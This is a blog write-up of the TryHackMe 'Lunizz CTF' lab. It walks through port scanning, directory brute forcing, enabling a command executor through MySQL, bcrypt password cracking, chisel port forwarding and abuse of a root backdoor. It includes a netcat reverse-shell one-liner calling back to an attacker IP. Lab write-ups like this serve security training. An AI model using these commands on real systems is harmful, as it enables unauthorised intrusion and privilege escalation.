Lunizz CTF -TryHackMe

lunizz CTF

This is a write-up for another TryHackMe’s rooms named “Lunizz CTF”. This room is available here:

https://tryhackme.com/room/lunizzctfnd

As always lets starts our enumeration process to find out what services are running on the target.

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.190.71

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.190.71 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 16:34 EST
Nmap scan report for 10.10.190.71
Host is up (0.024s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
4444/tcp open krb524
5000/tcp open upnp
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000 10.10.190.71

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000 10.10.190.71 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 16:38 EST
Nmap scan report for 10.10.190.71
Host is up (0.056s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f8:08:db:be:ed:80:d1:ef:a4:b0:a9:e8:2d:e2:dc:ee (RSA)
| 256 79:01:d6:df:8b:0a:6e:ad:b7:d8:59:9a:94:0a:09:7a (ECDSA)
|_ 256 b1:a9:ef:bb:7e:5b:01:cd:4c:8e:6b:bf:56:5d:a7:f4 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL 5.7.32-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.32-0ubuntu0.18.04.1
| Thread ID: 4
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongPassword, SupportsTransactions, LongColumnFlag, IgnoreSigpipes, SwitchToSSLAfterHandshake, SupportsCompression, FoundRows, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: iM\x08P=\x1A "M}K^\x16jnU\x1Cv\x10]
|_ Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.32_Auto_Generated_Server_Certificate
| Not valid before: 2020-12-10T19:29:01
|_Not valid after: 2030-12-08T19:29:01
|_ssl-date: TLS randomness does not represent time
4444/tcp open krb524?
| fingerprint-strings:
| GetRequest:
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| Wrong Password
| NULL:
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| SSLSessionReq:
| Can you decode this for me?
|_ ZXh0cmVtZXNlY3VyZXJvb3RwYXNzd29yZA==
5000/tcp open upnp?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GenericLines, Kerberos, LDAPSearchReq, NULL, NotesRPC, RPCCheck, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe, giop, oracle-tns:
| OpenSSH 5.1
|_ Unable to load config info from /usr/local/ssl/openssl.cnf
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4444-TCP:V=7.91%I=7%D=2/24%Time=6036C75F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,31,"Can\x20you\x20decode\x20this\x20for\x20me\?\ncmFuZG9tcGFzc3dvcmQ
SF:=\n")%r(GetRequest,3F,"Can\x20you\x20decode\x20this\x20for\x20me\?\ncmF
SF:uZG9tcGFzc3dvcmQ=\nWrong\x20Password")%r(SSLSessionReq,41,"Can\x20you\x
SF:20decode\x20this\x20for\x20me\?\nZXh0cmVtZXNlY3VyZXJvb3RwYXNzd29yZA==\n
SF:");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.91%I=7%D=2/24%Time=6036C759%P=x86_64-pc-linux-gnu%r(NU
SF:LL,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\
SF:x20/usr/local/ssl/openssl\.cnf")%r(GenericLines,46,"OpenSSH\x205\.1\nUn
SF:able\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\
SF:.cnf")%r(SMBProgNeg,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config
SF:\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(RPCCheck,46,"OpenSS
SF:H\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/local
SF:/ssl/openssl\.cnf")%r(DNSStatusRequestTCP,46,"OpenSSH\x205\.1\nUnable\x
SF:20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")
SF:%r(SSLSessionReq,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x2
SF:0info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(TerminalServerCookie,4
SF:6,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/
SF:usr/local/ssl/openssl\.cnf")%r(TLSSessionReq,46,"OpenSSH\x205\.1\nUnabl
SF:e\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cn
SF:f")%r(Kerberos,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20i
SF:nfo\x20from\x20/usr/local/ssl/openssl\.cnf")%r(X11Probe,46,"OpenSSH\x20
SF:5\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/
SF:openssl\.cnf")%r(FourOhFourRequest,46,"OpenSSH\x205\.1\nUnable\x20to\x2
SF:0load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(LDAP
SF:SearchReq,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x
SF:20from\x20/usr/local/ssl/openssl\.cnf")%r(SIPOptions,46,"OpenSSH\x205\.
SF:1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/ope
SF:nssl\.cnf")%r(NotesRPC,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20con
SF:fig\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(oracle-tns,46,"O
SF:penSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/
SF:local/ssl/openssl\.cnf")%r(giop,46,"OpenSSH\x205\.1\nUnable\x20to\x20lo
SF:ad\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cnf");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 22.04 ms 10.8.0.1
2 22.81 ms 10.10.190.71
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds

Port 22 SSH version is stable and there are no know vulnerabilities. Port 80 has a web server which we will explore more in the next section. MySql is running on port 3306.Port 4444 exposes 2 password which are base64 encoded which may be used later on.Port 5000 seems to be running OpenSSH 5.1,which is a very old SSH version.We will explore it later.

Directory Brute Forcing with FFUF

We saw port 80 is open, so let’s brute force the directories and files which are exposed by this web server using ffuf:

ffuf -u http://10.10.190.71/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.190.71/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://10.10.190.71/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.php [Status: 200, Size: 10917, Words: 3499, Lines: 375]
instructions.txt [Status: 200, Size: 338, Words: 39, Lines: 13]
hidden [Status: 301, Size: 313, Words: 20, Lines: 10]
whatever [Status: 301, Size: 315, Words: 20, Lines: 10]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 10917, Words: 3499, Lines: 375]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 475 req/sec :: Duration: [0:18:17] :: Errors: 0 ::

We saw few interesting results above.The “whatever” directory looks interesting as this indicates that we can run commands on the server,but the mode looks to be disabled:

cmd executer mode 0

What is the default password for mysql?

From the FFUF scan we saw a file named “instructions.txt”, so lets open it up in a browser:

instructions.txt

As we can see we found a user for mysql and a corresponding default password.Lets connect to the database using this user and password:

mysql -u runcheck -h 10.10.20.133 -p

connect database using mysql

And yes we can connect to the database.Let’s explore the database by running the following commands:

MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| runornot |
+--------------------+
2 rows in set (0.019 sec)
MySQL [(none)]> use runornot;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [runornot]> show tables;
+--------------------+
| Tables_in_runornot |
+--------------------+
| runcheck |
+--------------------+
1 row in set (0.019 sec)
MySQL [runornot]> select * from runcheck;
+------------+
| [REDACTED] |
+------------+
| 0 |
+------------+
1 row in set (0.028 sec)
MySQL [runornot]>

I can’t run commands, there must be a mysql column that controls command executer:

From the Table “runcheck”, we were able to find the name of the column which looks to be controlling the command executer as it’s value is 0 currently. We can update this value to 1 and check if we can exeute something.

MySQL [runornot]> UPDATE runcheck SET [REDACTED] = 1;
Query OK, 1 row affected (0.030 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MySQL [runornot]> select * from runcheck;
+------------+
| [REDACTED] |
+------------+
| 1 |
+------------+
1 row in set (0.018 sec)
MySQL [runornot]>

Now as the columns value is update, lets check if we can execute commands:

cmd executer mode 1

Indeed we can!

a folder shouldn’t be…

Lets execute “ls -lrt /” and we will get our answer of the above question.

Reverse Shell

From the command executer we can also get a reverse shell now.Execute the following from the executer after staring a netcat listener on your kali/attacker machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 9999 >/tmp/f

Yes, we got the shell:

reverse shell

Upgrade Shell

Upgrade and stabilize the shell which we got by running the following commands:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm

Privilege Escalation

Transfer LinPEAS.sh on to the target and run it.We can see that something is running on internal port 8080:

Ports

Also we found a directory /var/backups/.scripts that explains what is running on ports 4444 and 5000, which turns out to be rabbit holes.

/var/backups

Exploring the directory /proct which we found earlier and also highlighted by LinPEAS we found a python file with the following code:

www-data@lunizz:/$ cat /proct/pass/bcrypt_encryption.py 
import bcrypt
import base64
password = # https://www.youtube.com/watch?v=-tJYN-eG1zk&ab_channel=QueenOfficial
bpass = password.encode('ascii')
passed= str(base64.b64encode(bpass))
hashAndSalt = bcrypt.hashpw(passed.encode(), bcrypt.gensalt())
print(hashAndSalt)
salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'
# I wrote this code last year and i didnt save password verify line... I need to find my password

The YouTube link gives us the hint that the password can be in rockyou.txt word list and this and the code above explains that the hash is a bcrypt hash .So let’s crack it with john the ripper:

john -format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

where hash.txt contains the hash. This still didn’t cracked the password.

We will use the code given above to write a python script that will use the salt and bcrypt the passwords from rockyou.txt and compare them with the hash given(salt is actually the part of the hash which is confusingly named the variable named “salt” in the script):

This will take a lot of time to crack the password and it will fail for some passwords in rockyou.txt as they contain some special characters.It is best to remove those passwords from the list as you encounter them and remove the passwords which have already been tested till now.

[**UPDATE**]

From python docs , we can add an ignore handler on line 10 in the script above. This will handle the special characters automatically and there should be no need to manipulate the rockyou.txt.

hi adam, do you remember our place?

Now do switch user to “adam” using this password as the file “/proct/pass/bcrypt_encryption.py” was owned by the user “adam”. Exploring the home directory, you will find the file which contains the password for mason:

adam@lunizz:~$ cat /home/adam/Desktop/.archive/to_my_best_friend_adam.txt 
do you remember our place
i love there it's soo calming
i will make that lights my password
--https://www.google.com/maps/@68.5090469,27.481808,3a,75y,313.8h,103.6t/data=!3m6!1e1!3m4!1skJPO1zlKRtMAAAQZLDcQIQ!3e2!7i10000!8i5000adam@lunizz:~$

Open the link and it will reveal the password.

user.txt

Now switch user to the user “mason” with this new password found and we will find the user.txt on mason’s home directory:

root.txt

We saw with LinPEAS that something is running on Internal port 6666. We can set up port forwarding on to our kali machine and can access this internal port. We will use chisel for port forwarding:

On Kali run chisel as server:

./chisel server -p 9000 --reverse -v

chisel as server

On Target run chisel as a client:

./chisel client 10.8.98.192:9000 R:10.8.98.192:8080:127.0.0.1:8080

chisel as client

Here chisel which is running as a client will connect to the server(chisel running on kali machine on port 9000) and will ‘R’edirect the traffic from kali machine(10.8.98.192 in my case) from port 8080 to the internal port 8080 on the Target Machine.

Accessing http://10.8.98.192:8080 on the kali machine, we got Mason’s Root Backdoor.:

Mason’s Root Backdoor

Intercept this request in Burp and you will notice that the request/response is send to the server using PHP and from above we need to send request with password and command type to access the backdoor. Taking example from here, request can be send to the target like this:

Let’s send the request using php from the command line using the above script:

So we need to use Mason’s password and send the request’s again with cmd type as lsla:

This worked! and the contents are the file listing of the root directory. Now this time send the request with passwd as the command type:

This changed the password of the root user. Let’s switch user to root by using this new password:

This also worked and found the root flag at /root/root.txt

That’s it.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Evolving the Manifesto

Topic-like architecture with RabbitMQ and Spring Boot

How to use PetaPoco with Umbraco 7

Web Application Architecture

Searching and Sorting Algorithms

Druid complex Lookup using other dimensions, with native query or Golang

5 Practices to Help You Become the Best Developer That You Can Be

WSWD — Getting to 20K Downloads

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

Tr0ll 1 Vulnhub Walkthrough

FALL Vulnhub Walkthrough

IIUC CyberCon 2022 CTF Write-ups

Oh My Webserver - WriteUP